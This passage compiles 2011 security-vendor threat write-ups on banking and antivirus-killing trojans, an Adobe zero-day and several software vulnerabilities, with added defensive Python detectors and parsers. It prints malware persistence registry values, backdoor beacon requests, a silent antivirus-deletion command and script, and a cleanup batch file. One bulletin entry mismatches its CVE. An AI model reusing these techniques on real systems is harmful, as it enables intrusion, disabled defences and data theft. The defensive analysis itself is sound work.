Banker.WXS infects bootloader and steals banking data (Dec 15, 2011)

SonicWALL UTM Research team received reports of a new Banking trojan in the wild. This Banking trojan infects the Windows NT system’s NTLDR bootloader, the file that runs before the computer’s operating system. It also steals banking data and target files related to GBPlugin, a browser security plug-in used mostly by Brazilian Banks.

The source of this Trojan has been linked to spam e-mail containing download links.

Once the user downloads and executes the trojan, it will do the following activities:

Downloads the file wxp.zip that contains the following:

  • xp-msantivirus
  • xp-msclean
  • ntldrv2
  • menu.lst
  • clean.bat

Makes a backup of the system's ntldr as ntldr.old and replaces the original ntldr with the ntldrv2 file.
The new ntldr file is a modified GRUB bootloader that runs the file menu.lst.

The menu.lst is responsible for calling the files xp-msantivirus and xp-msclean during the system's reboot. These two files then remove files related to GBPlugin and other security software.

Files Created:

  • {Computer Name}12k12v3r1.exe – copy of the banker trojan

Added Registry:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run {Computer Name} “Application Data\{Computer Name}12k12v3r1.exe”
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced EnableBalloonTips dword:00000000
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\EscDomains
  • Disables User Account Control notifications by adding the following entries:
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center UacDisableNotify dword:00000001
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system EnableLUA dword:00000000
  • Disables Windows Defender by replacing the data of the following Run value:
    • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows Defender VTNC

Deleted Registry:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains @ “”
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges @ “”
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains @ “”
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges @ “”
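The bootloader swap and the registry changes above give a defender two concrete things to check on a suspect host. The following Python is an added example, not SonicWALL's code: it runs those checks against an offline snapshot (the bytes of the file currently installed as ntldr, plus a dict of exported registry values), so it can be used on a mounted image. The GRUB marker strings, the registry paths with their separators restored, and the sample data are my assumptions.

```python
"""Host-check heuristics for the Banker.WXS indicators described above.

Works on an offline snapshot: the raw bytes of the file installed as ntldr
and a dict of registry values {(key, value_name): data} exported from the
host, so nothing here touches a live system.
"""

# Strings a stock NTLDR does not contain but a GRUB stage2 image does; the
# trojan's ntldrv2 is a modified GRUB that reads menu.lst (per the write-up).
# Assumed marker set, not a vendor signature.
GRUB_MARKERS = (b"GRUB", b"menu.lst")

# Registry values the trojan sets: (key, value name) -> data it writes.
SUSPECT_VALUES = {
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
     "EnableBalloonTips"): 0,
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center",
     "UacDisableNotify"): 1,
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system",
     "EnableLUA"): 0,
}
RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"


def ntldr_looks_like_grub(ntldr_bytes: bytes) -> bool:
    """True if the bootloader image carries any of the GRUB strings."""
    return any(marker in ntldr_bytes for marker in GRUB_MARKERS)


def registry_findings(snapshot: dict) -> list:
    """Human-readable findings for values matching the trojan's changes."""
    findings = []
    for (key, name), expected in SUSPECT_VALUES.items():
        if snapshot.get((key, name)) == expected:
            findings.append(f"{name}={expected} under {key}")
    # Any Run entry whose data ends in 12k12v3r1.exe matches the dropped copy.
    for (key, name), data in snapshot.items():
        if key == RUN_KEY and str(data).lower().endswith("12k12v3r1.exe"):
            findings.append(f"Run entry {name!r} -> {data}")
    return findings


def assess(ntldr_bytes: bytes, snapshot: dict) -> dict:
    """Combine both checks into one verdict with supporting detail.
    A replaced bootloader is conclusive on its own; registry changes need at
    least two hits, since any one of them can also be set by an administrator."""
    reg = registry_findings(snapshot)
    grub = ntldr_looks_like_grub(ntldr_bytes)
    return {"bootloader_replaced": grub, "registry": reg,
            "suspicious": grub or len(reg) >= 2}


# Constructed sample: a fake ntldr embedding GRUB strings, and a snapshot
# carrying the write-up's registry changes (data values are illustrative).
SAMPLE_NTLDR = b"\x00" * 64 + b"GRUB \x00Loading stage2\x00/boot/grub/menu.lst\x00"
SAMPLE_SNAPSHOT = {
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced",
     "EnableBalloonTips"): 0,
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center", "UacDisableNotify"): 1,
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system",
     "EnableLUA"): 0,
    (RUN_KEY, "WORKSTATION1"): r"Application Data\WORKSTATION112k12v3r1.exe",
}

if __name__ == "__main__":
    print(assess(SAMPLE_NTLDR, SAMPLE_SNAPSHOT))
```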

After the installation, the system will be forced to reboot:

    screenshot

    Translation: “Windows Update is restarting your computer to install the critical security updates”

    screenshot

    Translation:

     Please wait while the operation is performed. Do not turn off or restart your computer. ATTENTION: files infected with viruses were found on your computer. Starting the virus removal process: Process started... This process may take a while depending on the number of infected files found. Do not turn off or restart your computer during this process; wait for it to complete, and your computer will be restarted automatically. Process completed successfully... Restarting the computer.

    screenshot

    Translation: “Booting. Starting the Microsoft Malicious Software Removal Tool”

    screenshot

    Translation:

     Malicious Software Removal Tool. Do not turn off or unplug the machine until this process completes.

During the reboot, the trojan removes the GBPlugin browser security plug-in and other security software, which leaves the system open to further malicious software. It tries to connect to other URLs, possibly to download additional malware. It also covers its tracks by deleting the originally downloaded files.

Network Activity:

  • Remote Server: 50.1{REMOVED}59/.RECURSOS/
  • DNS Queries:
    • smartp{REMOVED}yhoster.com
    • multip{REMOVED}omeze.com
    • arowhe{REMOVED}com
    • timbe{REMOVED}com
    • weigot{REMOVED}.com

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

GAV: Banker.WXS (Trojan)

Adobe Reader and Acrobat Zero Day exploit (Dec 9, 2011)

SonicWALL UTM Research team found reports of a new zero-day vulnerability (CVE-2011-2462) in Adobe Reader and Acrobat affecting Windows, Mac OS X, and Unix operating systems. This U3D memory corruption vulnerability (CVE-2011-2462) could lead to application crash, and may potentially allow the attacker to gain control of the victim machine. Adobe issued a security advisory on December 6, 2011 warning the users about this flaw.

SonicWALL UTM Research team got hold of a zero-day exploit for this vulnerability in the wild which is a specially crafted PDF file containing malicious encoded JavaScript and malicious U3D object. The exploit may arrive via e-mail or can be served via a malicious drive-by site.

A code snippet from the decoded version of the JavaScript, which performs the heap spray and drops a malicious executable file onto the target machine, is shown below:

screenshot

The malicious PDF file when opened performs the following activity on victim machine:

  • The encoded JavaScript uses a heap-spraying technique to crash the application and redirects to the second document page, as seen below.

    screenshot

    screenshot

  • It drops a backdoor Trojan on the target machine and runs it:
    • (USER)\Local Settings\pretty.exe — Detected as GAV: Wisp.A_2 (Trojan)
  • Creates a registry entry to ensure that the backdoor Trojan runs on system reboot:
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run office = “(USER)\Local Settings\pretty.exe”
  • The dropped backdoor Trojan then attempts to connect to a remote server prettyli(REMOVED)com and sends the following requests:
    • GET /asp/kys_allow_get.asp?s=https&name=getkys.kys&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122
    • GET /ASP/KYS_ALLOW_PUT.ASP?s=https&TYPE=ptpretty.tmp&hostname=(HOSTNAME)-(IPADDRESS)-pretty20111122
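The exploit document described above combines two things a benign PDF rarely carries together: a U3D object and (encoded) JavaScript. The following Python is an added example, not SonicWALL's detection logic: a static triage pass that inflates FlateDecode streams so hidden tokens become visible, then flags the U3D-plus-JavaScript combination. The token list is my own heuristic and the sample PDFs are constructed.

```python
"""Static triage of a PDF for the CVE-2011-2462 pattern: U3D content
combined with JavaScript. Keyword heuristics and sample data are assumptions."""
import re
import zlib

# /U3D marks the 3D object the exploit corrupts; /JS and /JavaScript mark
# script actions; /OpenAction ties a script to document load; FlateDecode
# streams may hide any of them from a plain keyword scan.
TOKENS = {
    "u3d": rb"/U3D\b",
    "javascript": rb"/J(?:S|avaScript)\b",
    "open_action": rb"/OpenAction\b",
    "flate": rb"/FlateDecode\b",
}
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.DOTALL)


def inflate_streams(pdf: bytes) -> bytes:
    """Return the PDF with every inflatable stream body appended in clear,
    so tokens behind FlateDecode are visible to the keyword scan."""
    extra = []
    for body in STREAM_RE.findall(pdf):
        try:
            extra.append(zlib.decompress(body))
        except zlib.error:
            continue  # not Flate (or truncated); the raw bytes are still scanned
    return pdf + b"\n" + b"\n".join(extra)


def triage(pdf: bytes) -> dict:
    """Count the tokens above (after inflating streams) and derive a verdict."""
    data = inflate_streams(pdf)
    counts = {name: len(re.findall(pat, data)) for name, pat in TOKENS.items()}
    # U3D plus JavaScript is the exploit's combination; either alone is common.
    counts["suspicious"] = counts["u3d"] > 0 and counts["javascript"] > 0
    return counts


def build_sample_pdf(with_js: bool) -> bytes:
    """Constructed minimal PDF: a U3D stream plus, optionally, a JavaScript
    OpenAction hidden inside a Flate-compressed object stream."""
    parts = [
        b"%PDF-1.6\n",
        b"1 0 obj << /Type /Catalog /Pages 2 0 R"
        + (b" /OpenAction 4 0 R" if with_js else b"") + b" >> endobj\n",
        b"3 0 obj << /Type /3D /Subtype /U3D /Length 4 >> stream\nU3D\x00\nendstream endobj\n",
    ]
    if with_js:
        hidden = zlib.compress(b"4 0 obj << /S /JavaScript /JS (app.alert(1)) >> endobj")
        parts.append(b"5 0 obj << /Type /ObjStm /Filter /FlateDecode /Length "
                     + str(len(hidden)).encode() + b" >> stream\n" + hidden
                     + b"\nendstream endobj\n")
    parts.append(b"%%EOF\n")
    return b"".join(parts)


if __name__ == "__main__":
    print(triage(build_sample_pdf(with_js=True)))
    print(triage(build_sample_pdf(with_js=False)))
```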

SonicWALL UTM appliance provides protection against this threat via the following signatures:

  • GAV: CVE-2011-2462.A (Exploit)
  • IPS: Malformed PDF File 14b

Microsoft Security Bulletin Coverage (Dec 13, 2011)

SonicWALL has analyzed and addressed Microsoft’s security advisories for the month of December, 2011. A list of issues reported, along with SonicWALL coverage information follows:

MS11-087 Vulnerability in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2639417)

  • CVE-2011-3402 TrueType Font Parsing Vulnerability
    GAV: Malformed.ttf.MP.1

MS11-088 Vulnerability in Microsoft Office IME (Chinese) Could Allow Elevation of Privilege (2652016)

  • CVE-2011-2010 Pinyin IME Elevation Vulnerability
    This is a local vulnerability.

MS11-089 Vulnerability in Microsoft Office Could Allow Remote Code Execution (2590602)

  • CVE-2011-1983 Word Use After Free Vulnerability
    GAV: Malformed.doc.MP.4

MS11-090 Cumulative Security Update of ActiveX Kill Bits (2618451)

  • CVE-2011-3397 Microsoft Time Remote Code Execution Vulnerability
    IPS: 7224 – MS IE Time Element Remote Code Execution 1
    IPS: 7225 – MS IE Time Element Remote Code Execution 2

MS11-091 Vulnerabilities in Microsoft Publisher Could Allow Remote Code Execution (2607702)

  • CVE-2011-1508 Publisher Function Pointer Overwrite Vulnerability
    No details available.
  • CVE-2011-3410 Publisher Out-of-bounds Array Index Vulnerability
    IPS: 7226 – Malformed Publisher Document 3b
  • CVE-2011-3411 Publisher Invalid Pointer Vulnerability
    IPS: 7227 – Malformed Publisher Document 4b
  • CVE-2011-3412 Publisher Memory Corruption Vulnerability
    IPS: 7228 – Malformed Publisher Document 5b

MS11-092 Vulnerability in Windows Media Could Allow Remote Code Execution (2648048)

  • CVE-2011-3401 Windows Media Player DVR-MS Memory Corruption Vulnerability
    GAV: MsApp.Exp.MP.2

MS11-093 Vulnerability in OLE Could Allow Remote Code Execution (2624667)

  • CVE-2011-3400 OLE Property Vulnerability
    IPS: 7230 – Malformed Visio Document 4b

MS11-094 Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (2639142)

  • CVE-2011-3396 PowerPoint Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt 1
    IPS: 1023 – Possible Binary Planting Attempt 2
    IPS: 6847 – Possible Binary Planting Attempt 3
  • CVE-2011-3413 OfficeArt Shape RCE Vulnerability
    GAV: Malformed.ppt.MP.2

MS11-095 Vulnerability in Active Directory Could Allow Remote Code Execution (2640045)

  • CVE-2011-3396 PowerPoint Insecure Library Loading Vulnerability
    It is not possible to distinguish attack from normal traffic.

MS11-096 Vulnerability in Microsoft Excel Could Allow Remote Code Execution (2640241)

  • CVE-2011-3403 Record Memory Corruption Vulnerability
    GAV: Malformed.xls.MP.11

MS11-097 Vulnerability in Windows Client/Server Run-time Subsystem Could Allow Elevation of Privilege (2620712)

  • CVE-2011-3408 CSRSS Local Privilege Elevation Vulnerability
    This is a local vulnerability.

MS11-098 Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2633171)

  • CVE-2011-2018 Windows Kernel Exception Handler Vulnerability
    This is a local vulnerability.

MS11-099 Cumulative Security Update for Internet Explorer (2618444)

  • CVE-2011-1992 XSS Filter Information Disclosure Vulnerability
    This is a cross domain vulnerability. It is not possible to distinguish attack from normal traffic.
  • CVE-2011-2019 Internet Explorer Insecure Library Loading Vulnerability
    IPS: 5726 – Possible Binary Planting Attempt 1
    IPS: 1023 – Possible Binary Planting Attempt 2
    IPS: 6847 – Possible Binary Planting Attempt 3
  • CVE-2011-3404 Content-Disposition Information Disclosure Vulnerability
    It is not possible to distinguish attack from normal traffic.

Cisco WebEx Player Remote Code Execution (Dec 8, 2011)

WebEx Communications Inc. is a Cisco company that provides on-demand collaboration, online meeting, web conferencing and videoconferencing applications. Its products include Meeting Center, Training Center, Event Center, Support Center, Sales Center, MeetMeNow, PCNow, WebEx AIM Pro Business Edition, WebEx WebOffice, WebEx Connect and WebEx Player.

Cisco WebEx uses the proprietary WRF file format (.wrf extension) to store WebEx meeting recordings on the computer of an on-line meeting attendee. The structure of this file is not publicly documented. Reverse-engineering has identified the following structure as a file header:

     Offset  Size  Field
     -----------------------------------------------------
     0x00    4     Magic number = 57 4f 54 46 (WOTF)
     0x04    4     Unknown
     0x08    4     File size in bytes

After the header, there may be multiple records in the file. The records may have the following format:

     Offset  Size  Field
     --------------------------------------------------------------------------------
     0x00    1     Field Type
     0x01    4     Size of the record
     0x05    m     unknown
     0xXX    4     Datasize (n)
     0xXX    n     Data

A code execution vulnerability exists in the Cisco WebEx Player ATA32.dll module. The vulnerable code trusts the data from the records of the WRF file and uses it to determine the size and the offset in a source/destination buffer for a memcpy call, then overwrites memory with the data from the file.

A remote unauthenticated attacker can exploit this vulnerability to inject and execute arbitrary code with the privileges of the currently logged on user. If code execution fails, the vulnerable application will terminate abnormally.
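The flaw above is a length field copied straight into memcpy. The following Python is an added example, not Cisco's parser: a walk over the WRF layout from the two tables that validates every record size against the bytes actually present before using it. The page leaves the fields after the record size unknown, so only Field Type and Size are interpreted; the byte order of the size fields is assumed little-endian and the sample file is constructed.

```python
"""Bounds-checked walk over the WRF layout described above. Assumptions:
little-endian size fields, and the bytes after the 4-byte record size are
treated as opaque payload because the page leaves them unknown."""
import struct

WRF_MAGIC = b"WOTF"
HEADER_LEN = 12            # 4 magic + 4 unknown + 4 file size
RECORD_FIXED_LEN = 5       # 1 field type + 4 record size


class WrfError(ValueError):
    """A length field is inconsistent with the data actually present."""


def parse_header(data: bytes) -> int:
    """Validate the 12-byte header and return the declared file size."""
    if len(data) < HEADER_LEN or data[:4] != WRF_MAGIC:
        raise WrfError("not a WRF file")
    declared = struct.unpack_from("<I", data, 8)[0]
    if declared != len(data):
        raise WrfError(f"header says {declared} bytes, file has {len(data)}")
    return declared


def walk_records(data: bytes) -> list:
    """Return (field_type, payload) for each record, or raise WrfError."""
    parse_header(data)
    records, pos = [], HEADER_LEN
    while pos < len(data):
        if len(data) - pos < RECORD_FIXED_LEN:
            raise WrfError(f"truncated record header at offset {pos}")
        field_type = data[pos]
        size = struct.unpack_from("<I", data, pos + 1)[0]
        # The check that matters: a size that will drive a copy must cover at
        # least the record's own fixed part and must not exceed what remains.
        if size < RECORD_FIXED_LEN or size > len(data) - pos:
            raise WrfError(f"record at {pos} declares {size} bytes, "
                           f"{len(data) - pos} remain")
        records.append((field_type, data[pos + RECORD_FIXED_LEN:pos + size]))
        pos += size
    return records


def rejects(data: bytes) -> bool:
    """True if the walker refuses the file (convenience for callers and tests)."""
    try:
        walk_records(data)
    except WrfError:
        return True
    return False


def build_wrf(records: list, lie_about_size: bool = False) -> bytes:
    """Constructed sample file; lie_about_size inflates the last record's size
    field the way a malformed file would, while the header stays consistent."""
    body = b""
    for i, (ftype, payload) in enumerate(records):
        size = RECORD_FIXED_LEN + len(payload)
        if lie_about_size and i == len(records) - 1:
            size += 0x1000
        body += struct.pack("<BI", ftype, size) + payload
    total = HEADER_LEN + len(body)
    return WRF_MAGIC + b"\0\0\0\0" + struct.pack("<I", total) + body


SAMPLE = [(0x01, b"\x00\x00\x00\x00\x04\x00\x00\x00abcd"), (0x02, b"")]

if __name__ == "__main__":
    print(walk_records(build_wrf(SAMPLE)))
    print("malformed rejected:", rejects(build_wrf(SAMPLE, lie_about_size=True)))
```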

SonicWALL UTM team has researched this vulnerability and released the following IPS signature to detect the attacks based on this vulnerability:

  • 7202 Cisco WebEx Player Remote Code Execution

This vulnerability has been assigned CVE-2011-4004.

Apache HTTPD mod_proxy Security Bypass (Dec 2, 2011)

The Apache HTTP Server, commonly referred to as Apache, is web server software notable for playing a key role in the initial growth of the World Wide Web. In 2009 it became the first web server software to surpass the 100 million website milestone. The server is capable of being utilized with many different options and configurations. A wide variety of runtime loadable plug-in modules can be used to extend its functionality.

One of the official plug-in modules is mod_proxy. Like all other modules, it can be compiled as a separate shared library with a “.so” extension. The purpose of this module is to let the Apache HTTP server run as a forward or reverse proxy for FTP, HTTP, and HTTPS. The proxy functionality is turned on by its relevant configuration directives. In a reverse proxy setup, users send an HTTP request to the web server, which then forwards it to the appropriate backend server.

HTTP is a request/response protocol spoken between clients and HTTP servers. HTTP uses Uniform Resource Identifiers (URIs) to locate web pages. A typical HTTP request with its URI is shown below:

     GET /test/index.html HTTP/1.1
     HOST: www.example.com

A policy bypass vulnerability exists in the Apache HTTP server. The vulnerability is due to a design weakness in the Apache reverse proxy module mod_proxy when it is configured in a specific manner. In that configuration the code may fail to sufficiently sanitize the Request-URI of an HTTP request. As a result, an internal web server that should not be accessible to external users can be reached through the reverse proxy server.
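The sanitization the vulnerable configuration lacks is a check on the shape of the Request-URI before it is rewritten onto a backend. The following Python is an added example, not Apache's code: a front-end validator that accepts only the Request-URI forms RFC 2616 defines, forwards origin-form URIs verbatim, reduces absolute-form URIs to their path so the client cannot name a host, and rejects everything else. The backend address and sample request lines are constructed.

```python
"""Request-URI form check for a reverse proxy front end. Assumption: the
backend URL and the sample request lines below are constructed."""
from typing import Optional
from urllib.parse import urlsplit


def classify_request_uri(uri: str) -> str:
    """Return 'origin', 'absolute', 'asterisk' or 'invalid' per RFC 2616 section 5.1.2."""
    if uri == "*":
        return "asterisk"
    if uri.startswith("/"):
        return "origin"
    parts = urlsplit(uri)
    if parts.scheme in ("http", "https") and parts.netloc:
        return "absolute"
    return "invalid"


def proxy_target(request_line: str, backend: str) -> Optional[str]:
    """Rewrite an accepted request onto the backend; None means 'reject'.

    Only the path (and query) ever reaches the backend URL. A Request-URI that
    is neither origin-form nor absolute-form is dropped here instead of being
    concatenated onto a proxy destination, which is the step the bug skips."""
    try:
        method, uri, version = request_line.split()
    except ValueError:
        return None
    if not version.startswith("HTTP/"):
        return None
    kind = classify_request_uri(uri)
    if kind == "origin":
        path = uri
    elif kind == "absolute":
        parts = urlsplit(uri)
        path = parts.path or "/"
        if parts.query:
            path += "?" + parts.query
    else:
        return None  # '*' is only meaningful for OPTIONS and is never proxied
    return backend.rstrip("/") + path


BACKEND = "http://backend.internal:8080"   # hypothetical internal server
SAMPLES = [
    "GET /test/index.html HTTP/1.1",              # origin-form, from the page
    "GET http://www.example.com/a?b=1 HTTP/1.1",  # absolute-form, host ignored
    "GET test/index.html HTTP/1.1",               # no leading slash: rejected
    "GET * HTTP/1.1",                             # asterisk-form: not proxied
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{line!r:48} -> {proxy_target(line, BACKEND)}")
```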

SonicWALL UTM team has researched this vulnerability and released the following IPS signatures:

  • 3105 Apache HTTPD mod_proxy Security Bypass 1
  • 3132 Apache HTTPD mod_proxy Security Bypass 2

This vulnerability has been assigned CVE-2011-3368.

Trojan uses Rootkit remover tool to disable Anti-virus (Dec 1, 2011)

The SonicWALL UTM research team received reports of a new KillAV Trojan in the wild. This Trojan uses a rootkit remover tool called The Avenger. According to the home page of this tool, “The Avenger is a fully-scriptable, kernel-level Windows driver designed to remove highly persistent files, registry keys/values, and other drivers protected by entrenched malware”. Ironically, the Trojan uses this anti-malware tool to remove files belonging to a variety of well-known anti-virus products from vendors such as AVG, Kaspersky and Symantec. Most anti-virus software protects its files from user-mode removal; however, it is very hard to protect such files from kernel-mode attacks.

The Trojan uses the following icon:

The Trojan adds the following files to the filesystem:

  • C:\DRIVERS10\KDESCK.exe [Avenger executable]
  • C:\DRIVERS10\TDESCK.txt [Avenger file instructions]
  • C:\WINDOWS\system32\eihs.txt [Avenger file instructions]
  • C:\DRIVERS10\WINNTK.exe [Detected as GAV: KillFiles.NEK (Trojan)]
  • C:\cleanup.exe [Detected as GAV: Zapchast.M (Trojan)]
  • C:\cleanup.bat [Cleanup instructions]
  • C:\zip.exe [Zip utility]
  • C:\WINDOWS\system32\drivers\tsfqiza.sys [Avenger kernel-mode driver]

TDESCK.txt contains the following information:

      Folders to delete:
      %ProgramFiles%\AVG
      %ProgramFiles%\Panda Security
      %ProgramFiles%\ESET
      %ProgramFiles%\KASPER~1
      %ProgramFiles%\Avira
      %ProgramFiles%\Softwin
      %ProgramFiles%\Grisoft
      %ProgramFiles%\NORTON~1
      %ProgramFiles%\Microsoft Security Client
      Files to move:
      %ProgramFiles%\Alwil Software\Avast5\AvastUI.exe|%ProgramFiles%\Alwil Software\Avast5\AvastUI.exa
      %ProgramFiles%\Alwil Software\Avast5\AvastSvc.exe|%ProgramFiles%\Alwil Software\Avast5\AvastSvc.exa
      %ProgramFiles%\AVAST Software\Avast\AvastSvc.exe|%ProgramFiles%\AVAST Software\Avast\AvastSvc.exa
      %ProgramFiles%\AVAST Software\Avast\AvastUI.exe|%ProgramFiles%\AVAST Software\Avast\AvastUI.exa

The above information instructs the Avenger software to remove or move files and directories belonging to various anti-virus software.

Upon infection, the following command is run to remove the anti-virus files listed above in TDESCK.txt. This command runs Avenger invisibly without its GUI:

      cmd /c C:\DRIVERS10\KDESCK.exe /nogui C:\DRIVERS10\TDESCK.txt
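An Avenger script dropped by malware, like the TDESCK.txt above, is itself a useful artifact: its sections name exactly what the attacker wants removed. The following Python is an added example, not SonicWALL's tooling: it parses the section/directive layout shown in the write-up and flags every directive whose path names a security product directory. The product-name list is my own, any section header of the form "Words:" is accepted, and the sample script is constructed from the directives above.

```python
"""Triage of an Avenger-style script: parse its sections and flag directives
that target security products. Product list and sample are assumptions."""
import re
from typing import Dict, List, Optional, Tuple

SECTION_RE = re.compile(r"^([A-Za-z][A-Za-z ]*):$")
# Directory names from the write-up plus a few other vendors; lower-case,
# matched against each path component (8.3 short names included).
SECURITY_DIRS = {"avg", "panda security", "eset", "kasper~1", "kaspersky lab",
                 "avira", "softwin", "grisoft", "norton~1", "symantec",
                 "microsoft security client", "alwil software", "avast software"}


def parse_avenger_script(text: str) -> Dict[str, List[Tuple[str, Optional[str]]]]:
    """Return {section: [(source, destination_or_None), ...]}.
    'Files to move' lines use 'src|dst'; other sections carry a single path."""
    sections: Dict[str, List[Tuple[str, Optional[str]]]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1).lower()
            sections.setdefault(current, [])
            continue
        if current is None:
            raise ValueError(f"directive before any section header: {line!r}")
        src, _, dst = line.partition("|")
        sections[current].append((src, dst or None))
    return sections


def targets_security_product(path: str) -> bool:
    """True when any path component names a known security product directory."""
    parts = [p.lower() for p in re.split(r"[\\/]+", path) if p]
    return any(p in SECURITY_DIRS for p in parts)


def flag_security_tampering(text: str) -> List[str]:
    """List every directive in the script that hits a security product path."""
    hits = []
    for section, entries in parse_avenger_script(text).items():
        for src, dst in entries:
            if targets_security_product(src):
                hits.append(f"{section}: {src}" + (f" -> {dst}" if dst else ""))
    return hits


# Constructed sample mixing the write-up's directives with harmless ones.
SAMPLE_SCRIPT = r"""
Folders to delete:
%ProgramFiles%\AVG
%ProgramFiles%\KASPER~1
%ProgramFiles%\My Harmless App
Files to move:
%ProgramFiles%\Alwil Software\Avast5\AvastUI.exe|%ProgramFiles%\Alwil Software\Avast5\AvastUI.exa
Registry keys to delete:
HKLM\Software\Example\Harmless
"""

if __name__ == "__main__":
    for hit in flag_security_tampering(SAMPLE_SCRIPT):
        print(hit)
```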

cleanup.bat contains the following information:

      @ECHO OFF
      cd %systemdrive%
      if exist %systemdrive%\avenger\backup.zip move /y %systemdrive%\avenger\backup.zip "%systemdrive%\avenger\backup-%date:/=.%-%time::=.%.zip"
      move /y backup.reg %systemdrive%\avenger
      copy /y avenger.txt %systemdrive%\avenger
      for %%a in (c d e f g h i j k l m n o p q r s t u v w x y z) do if exist %%a:\avenger attrib -r -h -s %%a:\avenger\* /S /D & zip -r -S -q -m -! -P infected "%systemdrive%\avenger\backup.zip" %%a:\avenger\* -x %systemdrive%\avenger\backup*.zip & rmdir %%a:\avenger
      del zip.exe
      del cleanup.exe
      del cleanup.bat

The Trojan adds the following keys to the Windows registry to install the Avenger kernel-mode driver and run WINNTK.exe and cleanup.exe after reboot:

  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Windows Debug “C:\DRIVERS10\WINNTK.exe”
  • HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Cleanup “C:\cleanup.exe”
  • HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mmjnbxj ImagePath “C:\WINDOWS\system32\drivers\tsfqiza.sys”
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\mmjnbxj cvva “C:\WINDOWS\system32\eihs.txt”

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: KillFiles.NEK (Trojan)
  • GAV: Zapchast.M (Trojan)

HP Data Protector Information Disclosure (Nov 23, 2011)

HP Data Protector Media Operations facilitates tracking and management of storage media, as well as data recovery. It tracks online and offline media such as magnetic tapes. HP Data Protector Media Operations includes an administration GUI which can be installed on multiple hosts allowing several administrators to manage Media Operations.

The communication protocol used by the server and its clients is proprietary and not publicly documented. The default communication port for the server is TCP 19813. Messages to the server have the following structure:

     Offset   Size(bytes)   Description
     -------  ------------  ----------------------------------------
     0x0000   1             Opcode
     0x0001   3             unknown
     0x0004   4             record size (x)
     0x0008   4             unknown
     0x000C   x             record data

All multi-byte values are represented in big endian byte order. Several records are usually transferred together in a single packet. Sub records are contained in the record data field of a record structure. Records having an Opcode of 0x03, and a size value greater than four, have the following sub record structure:

     Offset   Size(bytes)   Description
     -------  ------------  --------------------------------
     0x0000   4             Opcode
     0x0001   1             record size (y)
     0x0004   y             filename

Sub records of the above form are possible file requests, which cause the server to return the contents of the file specified in the filename field. The file path resolves relative to the base directory of the server. This base directory is configurable upon product installation. If the record size of a 0x03 record is of a certain specific value, the request is interpreted as a directory listing request, and the contents of the base directory are returned to the client.

An information disclosure vulnerability exists in HP Data Protector, when handling file requests. The process retrieves the filename and appends it to the base directory without any sanitization. As such, directory traversal sequences can be used to traverse to any file on the filesystem. Consequently, the contents of any file will be returned to the client that initiated the file request. A remote, unauthenticated attacker could exploit this vulnerability to obtain confidential information that could be later utilized to compromise other resources.
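The fix for the issue above is a single check: resolve the requested name against the base directory and refuse anything that lands outside it. The following Python is an added example, not HP's code: it decodes the record layout from the tables, pulls the filename out of 0x03 file-request records, and applies that containment check. One assumption is needed because the page's sub-record table lists a 4-byte opcode at 0x00 and a 1-byte size at 0x01, which overlap: the example reads the size from byte 0x01 and the filename from 0x04 as the table states, and treats byte 0x00 as the opcode. The base directory and sample messages are constructed.

```python
"""Decoder for the HP Data Protector Media Operations record layout above,
plus the base-directory containment check the vulnerable server omits.
Assumptions: sub-record opcode is byte 0x00 (the page's table overlaps),
and BASE plus the sample requests are constructed."""
import os
import struct
from typing import List, Optional, Tuple

OUTER_HDR = struct.Struct(">B3sI4s")   # opcode, unknown, record size, unknown (big-endian)
FILE_REQUEST_OPCODE = 0x03


def parse_records(msg: bytes) -> List[Tuple[int, bytes]]:
    """Split one packet into (opcode, record data) pairs, validating each size."""
    out, pos = [], 0
    while pos < len(msg):
        if len(msg) - pos < OUTER_HDR.size:
            raise ValueError(f"truncated record header at offset {pos}")
        opcode, _, size, _ = OUTER_HDR.unpack_from(msg, pos)
        if size > len(msg) - pos - OUTER_HDR.size:
            raise ValueError(f"record at {pos} claims {size} bytes beyond packet end")
        pos += OUTER_HDR.size
        out.append((opcode, msg[pos:pos + size]))
        pos += size
    return out


def requested_filenames(msg: bytes) -> List[bytes]:
    """Filenames named by 0x03 records whose size exceeds four bytes."""
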